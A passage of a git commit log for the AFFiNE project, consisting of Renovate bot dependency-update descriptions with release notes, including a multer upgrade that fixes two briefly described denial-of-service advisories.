|---|---|---|---|
| [multer](https://redirect.github.com/expressjs/multer) | [`2.0.2` →
`2.1.0`](https://renovatebot.com/diffs/npm/multer/2.0.2/2.1.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/multer/2.1.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/multer/2.0.2/2.1.0?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload,
potentially causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

####
[CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

---

### Release Notes

<details>
<summary>expressjs/multer (multer)</summary>

###
[`v2.1.0`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#210)

[Compare
Source](https://redirect.github.com/expressjs/multer/compare/v2.0.2...v2.1.0)

- Add `defParamCharset` option for UTF-8 filename support
([#&#8203;1210](https://redirect.github.com/expressjs/multer/pull/1210))
- Fix [CVE-2026-2359](https://www.cve.org/CVERecord?id=CVE-2026-2359)
([GHSA-v52c-386h-88mc](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc))
- Fix [CVE-2026-3304](https://www.cve.org/CVERecord?id=CVE-2026-3304)
([GHSA-xf7r-hgr6-v32p](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:59:38 +08:00
renovate[bot] 4c40dcacd9 chore: bump up actions/setup-go action to v6 (#14553)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/setup-go](https://redirect.github.com/actions/setup-go) |
action | major | `v5` → `v6` |

---

### Release Notes

<details>
<summary>actions/setup-go (actions/setup-go)</summary>

### [`v6`](https://redirect.github.com/actions/setup-go/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/setup-go/compare/v5...v6)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:59:16 +08:00
renovate[bot] 76d28aaa38 chore: bump up @types/supertest version to v7 (#14546)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@types/supertest](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/supertest)
([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/supertest))
| [`^6.0.2` →
`^7.0.0`](https://renovatebot.com/diffs/npm/@types%2fsupertest/6.0.3/7.2.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@types%2fsupertest/7.2.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@types%2fsupertest/6.0.3/7.2.0?slim=true)
|

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:58:48 +08:00
renovate[bot] 86f48240ce chore: bump up actions/github-script action to v8 (#14551)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
|
[actions/github-script](https://redirect.github.com/actions/github-script)
| action | major | `v7` → `v8` |

---

### Release Notes

<details>
<summary>actions/github-script (actions/github-script)</summary>

###
[`v8`](https://redirect.github.com/actions/github-script/releases/tag/v8):
.0.0

[Compare
Source](https://redirect.github.com/actions/github-script/compare/v7...v8)

##### What's Changed

- Update Node.js version support to 24.x by
[@&#8203;salmanmkc](https://redirect.github.com/salmanmkc) in
[#&#8203;637](https://redirect.github.com/actions/github-script/pull/637)
- README for updating actions/github-script from v7 to v8 by
[@&#8203;sneha-krip](https://redirect.github.com/sneha-krip) in
[#&#8203;653](https://redirect.github.com/actions/github-script/pull/653)

##### ⚠️ Minimum Compatible Runner Version

**v2.327.1**\
[Release
Notes](https://redirect.github.com/actions/runner/releases/tag/v2.327.1)

Make sure your runner is updated to this version or newer to use this
release.

##### New Contributors

- [@&#8203;salmanmkc](https://redirect.github.com/salmanmkc) made their
first contribution in
[#&#8203;637](https://redirect.github.com/actions/github-script/pull/637)
- [@&#8203;sneha-krip](https://redirect.github.com/sneha-krip) made
their first contribution in
[#&#8203;653](https://redirect.github.com/actions/github-script/pull/653)

**Full Changelog**:
<https://github.com/actions/github-script/compare/v7.1.0...v8.0.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:58:23 +08:00
DarkSky c5d622531c feat: refactor copilot module (#14537) 2026-03-02 13:57:55 +08:00
renovate[bot] 60acd81d4b chore: bump up actions/labeler action to v6 (#14552)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/labeler](https://redirect.github.com/actions/labeler) |
action | major | `v5` → `v6` |

---

### Release Notes

<details>
<summary>actions/labeler (actions/labeler)</summary>

### [`v6`](https://redirect.github.com/actions/labeler/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/labeler/compare/v5...v6)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 11:59:25 +08:00
renovate[bot] 78f567a178 chore: bump up actions/checkout action to v6 (#14550)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/checkout](https://redirect.github.com/actions/checkout) |
action | major | `v4` → `v6` |

---

### Release Notes

<details>
<summary>actions/checkout (actions/checkout)</summary>

### [`v6`](https://redirect.github.com/actions/checkout/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/checkout/compare/v5...v6)

### [`v5`](https://redirect.github.com/actions/checkout/compare/v4...v5)

[Compare
Source](https://redirect.github.com/actions/checkout/compare/v4...v5)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 10:58:53 +08:00
renovate[bot] 784382cfb1 chore: bump up actions/cache action to v5 (#14549)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/cache](https://redirect.github.com/actions/cache) | action |
major | `v4` → `v5` |

---

### Release Notes

<details>
<summary>actions/cache (actions/cache)</summary>

### [`v5`](https://redirect.github.com/actions/cache/compare/v4...v5)

[Compare
Source](https://redirect.github.com/actions/cache/compare/v4...v5)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 10:58:27 +08:00
renovate[bot] 342451be1b chore: bump up actions/attest-build-provenance action to v4 (#14547)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
|
[actions/attest-build-provenance](https://redirect.github.com/actions/attest-build-provenance)
| action | major | `v2` → `v4` |

---

### Release Notes

<details>
<summary>actions/attest-build-provenance
(actions/attest-build-provenance)</summary>

###
[`v4`](https://redirect.github.com/actions/attest-build-provenance/compare/v3...v4)

[Compare
Source](https://redirect.github.com/actions/attest-build-provenance/compare/v3...v4)

###
[`v3`](https://redirect.github.com/actions/attest-build-provenance/compare/v2...v3)

[Compare
Source](https://redirect.github.com/actions/attest-build-provenance/compare/v2...v3)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 10:44:37 +08:00
renovate[bot] 2b6146727b chore: bump up RevenueCat/purchases-ios-spm version to from: "5.60.0" (#14545) 2026-03-02 08:48:25 +08:00
renovate[bot] d5245a3273 chore: bump up Recouse/EventSource version to from: "0.1.7" (#14541)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [Recouse/EventSource](https://redirect.github.com/Recouse/EventSource)
| patch | `from: "0.1.5"` → `from: "0.1.7"` |

---

### Release Notes

<details>
<summary>Recouse/EventSource (Recouse/EventSource)</summary>

###
[`v0.1.7`](https://redirect.github.com/Recouse/EventSource/releases/tag/0.1.7)

[Compare
Source](https://redirect.github.com/Recouse/EventSource/compare/0.1.6...0.1.7)

#### What's Changed

- Separate timeout interval values for request and resource by
[@&#8203;Recouse](https://redirect.github.com/Recouse) in
[#&#8203;46](https://redirect.github.com/Recouse/EventSource/pull/46)

**Full Changelog**:
<https://github.com/Recouse/EventSource/compare/0.1.6...0.1.7>

###
[`v0.1.6`](https://redirect.github.com/Recouse/EventSource/releases/tag/0.1.6)

[Compare
Source](https://redirect.github.com/Recouse/EventSource/compare/0.1.5...0.1.6)

#### What's Changed

- Fix visionOS availability error for split(by:) method by
[@&#8203;danielseidl](https://redirect.github.com/danielseidl) in
[#&#8203;45](https://redirect.github.com/Recouse/EventSource/pull/45)

#### New Contributors

- [@&#8203;danielseidl](https://redirect.github.com/danielseidl) made
their first contribution in
[#&#8203;45](https://redirect.github.com/Recouse/EventSource/pull/45)

**Full Changelog**:
<https://github.com/Recouse/EventSource/compare/0.1.5...0.1.6>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 06:26:20 +08:00
renovate[bot] fff63562b1 chore: bump up Lakr233/MarkdownView version to from: "3.6.3" (#14540)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[Lakr233/MarkdownView](https://redirect.github.com/Lakr233/MarkdownView)
| patch | `from: "3.6.2"` → `from: "3.6.3"` |

---

### Release Notes

<details>
<summary>Lakr233/MarkdownView (Lakr233/MarkdownView)</summary>

###
[`v3.6.3`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.2...3.6.3)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.2...3.6.3)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 06:26:03 +08:00
renovate[bot] 4136abdd97 chore: bump up rustc version to v1.93.1 (#14542)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [rustc](https://redirect.github.com/rust-lang/rust) | patch | `1.93.0`
→ `1.93.1` |

---

### Release Notes

<details>
<summary>rust-lang/rust (rustc)</summary>

###
[`v1.93.1`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1931-2026-02-12)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.93.0...1.93.1)

\===========================

<a id="1.93.1"></a>

- [Don't try to recover keyword as non-keyword
identifier](https://redirect.github.com/rust-lang/rust/pull/150590),
fixing an ICE that especially [affected
rustfmt](https://redirect.github.com/rust-lang/rustfmt/issues/6739).
- [Fix `clippy::panicking_unwrap` false-positive on field access with
implicit
deref](https://redirect.github.com/rust-lang/rust-clippy/pull/16196).
- [Revert "Update wasm-related dependencies in
CI"](https://redirect.github.com/rust-lang/rust/pull/152259), fixing
file descriptor leaks on the `wasm32-wasip2` target.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 06:25:51 +08:00
renovate[bot] e249e2e884 chore: bump up opentelemetry (#14543)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.211.0` →
`^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.211.0/0.212.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.212.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.211.0/0.212.0?slim=true)
|
|
[@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.5.0` →
`2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.5.0/2.5.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-zipkin/2.5.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-zipkin/2.5.0/2.5.1?slim=true)
|
|
[@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics))
| [`0.38.2` →
`0.38.3`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.38.2/0.38.3)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fhost-metrics/0.38.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fhost-metrics/0.38.2/0.38.3?slim=true)
|
|
[@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.211.0` →
`^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.211.0/0.212.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation/0.212.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation/0.211.0/0.212.0?slim=true)
|
|
[@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql))
| [`^0.58.0` →
`^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.58.0/0.60.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.60.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.58.0/0.60.0?slim=true)
|
|
[@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.211.0` →
`^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.211.0/0.212.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-http/0.212.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-http/0.211.0/0.212.0?slim=true)
|
|
[@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis))
| [`^0.59.0` →
`^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.59.0/0.60.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.60.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.59.0/0.60.0?slim=true)
|
|
[@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core))
| [`^0.57.0` →
`^0.58.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.57.0/0.58.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.58.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.57.0/0.58.0?slim=true)
|
|
[@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io))
| [`^0.57.0` →
`^0.59.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.57.0/0.59.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.59.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.57.0/0.59.0?slim=true)
|
|
[@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.5.0` →
`2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.5.0/2.5.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-metrics/2.5.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-metrics/2.5.0/2.5.1?slim=true)
|
|
[@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.211.0` →
`^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.211.0/0.212.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.212.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.211.0/0.212.0?slim=true)
|
|
[@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.5.0` →
`2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.5.0/2.5.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-trace-node/2.5.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-trace-node/2.5.0/2.5.1?slim=true)
|

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/exporter-prometheus)</summary>

###
[`v0.212.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a)

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/host-metrics)</summary>

###
[`v0.38.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0383-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...630937db1575c652201558467ae5c449075f0881)

##### Bug Fixes

- **instrumentation-host-metrics:** unpin and update to
systeminformation@^5.31.1
([#&#8203;3392](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3392))
([e4ffdb4](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ffdb43d160ace57420978da9c1855be653abe1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-graphql)</summary>

###
[`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0600-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881)

##### Features

- **instrumentation-graphql:** add parent name in attributes of resolver
span
([#&#8203;3287](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3287))
([ea2a90a](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ea2a90a87b5b5a6d29f980a73e61cefa020ab81c))

###
[`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0590-2026-02-16)

[Compare
